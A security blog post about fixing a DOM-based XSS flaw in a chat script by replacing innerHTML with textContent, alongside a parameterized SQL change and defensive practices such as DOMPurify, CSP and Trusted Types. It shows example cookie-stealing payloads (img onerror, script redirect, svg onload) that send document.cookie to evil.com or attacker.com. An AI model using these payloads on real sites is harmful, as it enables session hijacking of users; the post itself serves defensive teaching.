Back to Blog
low SEVERITY9 min read

When innerHTML Meets User Data: Fixing XSS Vulnerabilities in JavaScript

A low-severity Cross-Site Scripting (XSS) vulnerability was identified in `agent_chat.js`, where user-controlled data was being passed directly into DOM manipulation methods like `innerHTML`. While rated low severity, XSS vulnerabilities can be chained with other attacks to steal session tokens, redirect users, or execute arbitrary scripts in a victim's browser. The fix eliminates the unsafe pattern by replacing direct HTML injection with safer DOM manipulation techniques.

O
By orbisai0security
May 28, 2026

When innerHTML Meets User Data: Fixing XSS Vulnerabilities in JavaScript

Introduction

Cross-Site Scripting (XSS) is one of the most persistent and misunderstood vulnerabilities in web development. It consistently appears in the OWASP Top 10 — not because it's exotic or difficult to understand, but because it's surprisingly easy to introduce accidentally, especially when working with dynamic content in JavaScript.

In this post, we'll walk through a real-world fix applied to opencontext/web/static/js/agent_chat.js, where user-controlled data was being passed into DOM manipulation methods like innerHTML. We'll also dig into a related backend fix that tightened up SQL query construction. Together, these changes represent the kind of defense-in-depth thinking that separates secure applications from vulnerable ones.

Whether you're a junior developer just learning about XSS or a senior engineer doing a security review, this post will give you practical, actionable knowledge.


What Is This Vulnerability?

At its core, this vulnerability is about trusting user input too much, too early.

When JavaScript code takes a string that originates from user input — a chat message, a username, a URL parameter — and directly injects it into the DOM using methods like:

  • element.innerHTML = userInput
  • element.outerHTML = userInput
  • document.write(userInput)

...it opens the door for an attacker to inject arbitrary HTML and JavaScript into the page.

This is the essence of a DOM-based XSS vulnerability (CWE-79: Improper Neutralization of Input During Web Page Generation).

Why Should Developers Care?

You might be thinking: "It's rated low severity — how bad can it really be?"

Here's the thing about XSS: its severity is heavily context-dependent. A low-severity XSS in an isolated component can become a critical vulnerability when:

  • The affected page has access to authentication tokens or cookies
  • The application handles sensitive personal or financial data
  • The XSS can be stored (persisted in a database) and served to many users
  • It's chained with other vulnerabilities like CSRF or open redirects

In a chat interface like agent_chat.js, user-generated content is the entire point of the feature. That makes XSS hygiene especially important — every message rendered is a potential injection point.


The Vulnerability Explained

Technical Details

Let's look at the anti-pattern at the heart of this issue:

// ❌ VULNERABLE: Directly injecting user-controlled content into innerHTML
function renderMessage(userMessage) {
  const chatContainer = document.getElementById('chat-messages');
  chatContainer.innerHTML += `<div class="message">${userMessage}</div>`;
}

When userMessage contains something innocent like "Hello, world!", this works fine. But what if an attacker (or a mischievous user) sends this instead?

<img src=x onerror="fetch('https://evil.com/steal?cookie='+document.cookie)">

The browser parses that as valid HTML, renders a broken image, and executes the onerror handler — silently sending the victim's cookies to an attacker-controlled server.

How Could It Be Exploited?

Attack Scenario: Cookie Theft in a Chat Interface

  1. An attacker opens the chat interface and sends a message containing a malicious payload.
  2. If the message is stored server-side (stored XSS), every user who opens the chat later will have the script execute in their browser.
  3. If it's reflected (the attacker shares a crafted URL), the victim clicks the link and the script executes immediately.
  4. The script exfiltrates the session cookie, which the attacker uses to impersonate the victim.
// Payload example (URL-encoded for a reflected XSS scenario):
<script>document.location='https://attacker.com/log?c='+document.cookie</script>

// Or more subtle, using an event handler:
<svg onload="new Image().src='https://attacker.com/?x='+btoa(document.cookie)">

What's the Real-World Impact?

Impact Type Description
Session Hijacking Steal authentication cookies to impersonate users
Credential Harvesting Inject fake login forms to capture passwords
Malware Distribution Redirect users to malicious downloads
Defacement Alter the visual appearance of the page
Keylogging Capture everything a user types
Cryptojacking Run cryptocurrency miners in the victim's browser

The Fix

What Changed?

The fix addresses the unsafe DOM manipulation pattern in agent_chat.js by replacing direct innerHTML assignment with safer alternatives. The principle is simple: never hand raw user input to the browser's HTML parser.

Before: The Vulnerable Pattern

// ❌ BEFORE: User content injected directly as HTML
function displayAgentResponse(response) {
  const messageDiv = document.getElementById('agent-response');
  messageDiv.innerHTML = response; // 🚨 Dangerous!
}

// ❌ Also dangerous with template literals:
chatLog.innerHTML += `
  <div class="chat-bubble user">
    ${userInput}
  </div>
`;

After: The Safe Pattern

// ✅ AFTER: Using textContent for plain text
function displayAgentResponse(response) {
  const messageDiv = document.getElementById('agent-response');

  const bubble = document.createElement('div');
  bubble.className = 'chat-bubble agent';
  bubble.textContent = response; // ✅ Safe: treated as plain text, not HTML

  messageDiv.appendChild(bubble);
}

// ✅ Or using DOM APIs to build structure safely:
function renderUserMessage(userInput) {
  const chatLog = document.getElementById('chat-log');

  const wrapper = document.createElement('div');
  wrapper.className = 'chat-bubble user';
  wrapper.textContent = userInput; // ✅ No HTML parsing

  chatLog.appendChild(wrapper);
}

Why Does This Fix Work?

The key difference is how the browser interprets the content:

Method Interpretation Safe for User Input?
innerHTML = userInput Parsed as HTML ❌ No
outerHTML = userInput Parsed as HTML ❌ No
document.write(userInput) Parsed as HTML ❌ No
textContent = userInput Treated as plain text ✅ Yes
createTextNode(userInput) Treated as plain text ✅ Yes
setAttribute('data-x', userInput) Attribute value (with caveats) ⚠️ Context-dependent

When you use textContent, the browser automatically escapes characters like <, >, and & into their HTML entities (&lt;, &gt;, &amp;). The content is displayed exactly as typed — no script execution possible.

The Backend Fix: Parameterized SQL Queries

The PR also included an important backend fix in sqlite_backend.py. While not directly related to the XSS issue, it's worth understanding because it demonstrates the same core principle: never concatenate user-controlled data into executable strings.

Before (Vulnerable to SQL Injection):

# ❌ BEFORE: Building SQL conditions in a loop, concatenating strings
tag_conditions = []
for tag in tags:
    tag_conditions.append("document_tags.tag = ?")
    params.append(tag.lower())

if tag_conditions:
    where_conditions.append(
        f'id IN (SELECT document_id FROM document_tags WHERE {" OR ".join(tag_conditions)})'
    )

After (Safe Parameterized Query):

# ✅ AFTER: Using IN clause with proper placeholders
if tags:
    # Use proper parameterized query for tags
    tag_placeholders = ",".join(["?"] * len(tags))
    where_conditions.append(
        f'id IN (SELECT document_id FROM document_tags WHERE tag IN ({tag_placeholders}))'
    )
    for tag in tags:
        params.append(tag.lower())

The new approach generates a clean IN (?, ?, ?) clause where the number of placeholders exactly matches the number of tags. The database driver handles the safe binding of values, ensuring no tag value can ever break out of its intended context and modify the query structure.

This is the SQL equivalent of using textContent instead of innerHTML — keep data as data, never let it become code.


Prevention & Best Practices

1. Default to textContent for User-Generated Content

Make this your mental default: if it's user input, use textContent.

// ✅ The golden rule
element.textContent = userInput; // Always safe for display

Only reach for innerHTML when you genuinely need to render HTML structure — and when you do, ensure the content comes from a trusted source or has been sanitized.

2. Use a Trusted HTML Sanitization Library

When you do need to render rich text from users (think: markdown editors, comment sections with formatting), use a well-maintained sanitization library:

// Using DOMPurify — the industry standard
import DOMPurify from 'dompurify';

const cleanHTML = DOMPurify.sanitize(userInput, {
  ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a'],
  ALLOWED_ATTR: ['href']
});
element.innerHTML = cleanHTML; // ✅ Safe after sanitization

Recommended libraries:
- DOMPurify — Fast, well-tested, browser-focused
- sanitize-html — Good for Node.js environments
- xss — Configurable XSS filter

3. Implement a Content Security Policy (CSP)

A strong CSP header acts as a second line of defense. Even if XSS code is injected, a well-configured CSP can prevent it from executing or exfiltrating data:

Content-Security-Policy: 
  default-src 'self';
  script-src 'self' 'nonce-{random-nonce}';
  connect-src 'self' https://api.yourapp.com;
  img-src 'self' data:;
  style-src 'self' 'unsafe-inline';

With script-src 'self', inline scripts injected via XSS won't execute because they lack the required nonce.

4. Enable Trusted Types (Modern Browsers)

Trusted Types is a browser API that forces all innerHTML assignments to go through a policy function:

// Define a Trusted Types policy
const policy = trustedTypes.createPolicy('default', {
  createHTML: (input) => DOMPurify.sanitize(input)
});

// Now innerHTML only accepts TrustedHTML objects
element.innerHTML = policy.createHTML(userInput); // ✅ Goes through sanitizer
element.innerHTML = userInput; // ❌ Throws a TypeError — caught at runtime!

Enable it via CSP:

Content-Security-Policy: require-trusted-types-for 'script'

5. Use Static Analysis Tools

Don't rely solely on code review to catch these patterns. Integrate automated scanning:

Tool Type What It Catches
Semgrep SAST Custom rules for innerHTML, outerHTML patterns
ESLint + eslint-plugin-no-unsanitized Linter Flags unsafe DOM assignments
Snyk Code SAST Taint analysis for XSS data flows
CodeQL SAST Deep semantic analysis of XSS sinks
OWASP ZAP DAST Runtime XSS detection

The vulnerability in this post was caught by Semgrep using the rule javascript.browser.security.insecure-document-method.insecure-document-method — exactly the kind of automated guardrail every team should have in their CI/CD pipeline.

6. Follow the Principle of Least Privilege for DOM Access

  • Avoid document.write() entirely — it's a legacy API with no safe use cases in modern code
  • Prefer framework-provided templating (React's JSX, Angular's template binding) which escape by default
  • In React, treat dangerouslySetInnerHTML as a code smell requiring explicit review
// ✅ React escapes this automatically
function ChatMessage({ text }) {
  return <div className="message">{text}</div>;
}

// ❌ Bypasses React's escaping — use only with sanitized content
function RichMessage({ html }) {
  return <div dangerouslySetInnerHTML={{ __html: html }} />;
}

Security Standards & References


Conclusion

The vulnerability fixed in this PR is a classic example of how convenience and security can come into conflict. innerHTML is powerful and easy to use — that's exactly why it's dangerous when combined with user-controlled data.

The key takeaways from this fix are:

  1. User input is untrusted by default — treat it as data, never as markup or code
  2. textContent is your friend — it's the safe default for rendering user-provided strings
  3. When you need HTML, sanitize first — use DOMPurify or equivalent before touching innerHTML
  4. Defense in depth matters — CSP and Trusted Types add layers that catch what code review misses
  5. The same principle applies everywhere — whether it's HTML injection in the browser or SQL injection in the backend, the fix is the same: parameterize and separate data from code

Security vulnerabilities like XSS aren't signs of bad developers — they're signs of missing guardrails. By integrating static analysis tools like Semgrep into your CI/CD pipeline and establishing clear coding standards around DOM manipulation, you can catch these issues before they ever reach production.

Secure code is a habit, not an afterthought. Keep building it.


Found a security issue in your codebase? Automated tools like Semgrep can help you catch these patterns at scale before they become incidents.

View the Security Fix

Check out the pull request that fixed this vulnerability

View PR #275

Related Articles

low

From text/template to html/template: Closing the XSS Door in Go

A cross-site scripting (XSS) vulnerability was discovered and patched in a Go-based application where the `text/template` package was being used instead of the safer `html/template` package for rendering HTML content. This single-line fix — swapping one import — prevents user-controlled data from being injected as raw HTML, closing a potential attack vector for malicious script injection. While rated low severity, XSS vulnerabilities are among the most common and exploitable web security issues,

medium

Wildcard PostMessage Leak: How One Character Exposed User Sessions

A critical security flaw in a browser extension's authentication flow was sending sensitive session tokens and user data to any website using the wildcard "*" origin in postMessage. This vulnerability could have allowed malicious sites to intercept authentication credentials, but was fixed by restricting message delivery to the application's own origin.

critical

Fixing Session Hijacking: From Insecure Query Parameters to Secure Sessions

A critical session management vulnerability was recently patched in our application that allowed attackers to hijack user sessions by simply manipulating URL parameters. The fix addresses both client-side XSS vulnerabilities through unsafe DOM manipulation and server-side session validation issues, demonstrating how multiple security layers work together to protect user accounts.

low

SQL Injection via String Formatting: How Parameterized Queries Save the Day

A database query in DBeaver's Altibase extension was constructing SQL statements using `String.format()` with user-controlled input, creating a classic SQL injection vulnerability. The fix replaces the unsafe string interpolation with parameterized queries using `PreparedStatement`, ensuring user input is always treated as data rather than executable SQL. This type of vulnerability is deceptively simple to introduce but equally simple to fix once you know what to look for.